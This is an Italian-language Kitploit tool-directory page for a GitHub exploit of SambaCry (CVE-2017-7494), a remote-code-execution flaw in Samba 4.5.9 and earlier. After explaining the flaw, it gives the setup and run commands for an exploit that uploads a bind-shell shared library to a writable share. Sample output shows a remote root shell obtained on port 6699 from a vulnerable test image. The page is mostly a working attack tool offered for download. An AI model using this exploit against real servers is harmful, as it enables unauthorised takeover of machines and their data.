Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/00mjk/exploit-cve-2017-7494
Analisi delle VulnerabilitàExploitPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

SambaCry exploit (CVE-2017-7494)

Vedi Repository
124 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit SambaCry RCE per Samba 4.5.9

Samba è un software libero che reimplementa il protocollo di rete SMB/CIFS. Samba fornisce servizi di file e stampa per vari client Microsoft Windows e può integrarsi con un dominio Microsoft Windows Server, sia come Domain Controller (DC) che come membro del dominio. A partire dalla versione 4, supporta Active Directory e i domini Microsoft Windows NT.

Samba nella versione 4.5.9 e precedenti è vulnerabile a una vulnerabilità di esecuzione remota di codice chiamata SambaCry. CVE-2017-7494 consente a utenti autenticati remoti di caricare una libreria condivisa in una cartella condivisa scrivibile e di eseguire attacchi di esecuzione di codice per prendere il controllo dei server che ospitano servizi Samba vulnerabili.

Samba 3.x dopo 3.5.0 e 4.x prima di 4.4.14, 4.5.x prima di 4.5.10 e 4.6.x prima di 4.6.4 non limita il percorso del file quando si utilizzano named pipe di Windows, il che consente a utenti autenticati remoti di caricare una libreria condivisa in una cartella condivisa scrivibile e di eseguire codice arbitrario tramite una named pipe appositamente predisposta.

Exploit

Usa poetry per configurare l'ambiente per questo exploit

root@kitploit:~
pip3 install -r requirements.txt

Dopodiché puoi eseguirlo come segue:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

Ad esempio, se usi l'immagine vulnerabile da vulnerables/cve-2017-7494 e vuoi eseguire questo exploit contro di essa:

Scarica lo strumento
root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

E otterrai il seguente output:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

Riconoscimenti

Il payload per questo progetto, insieme al codice, è stato fortemente ispirato da opsxcq/exploit-CVE-2017-7494.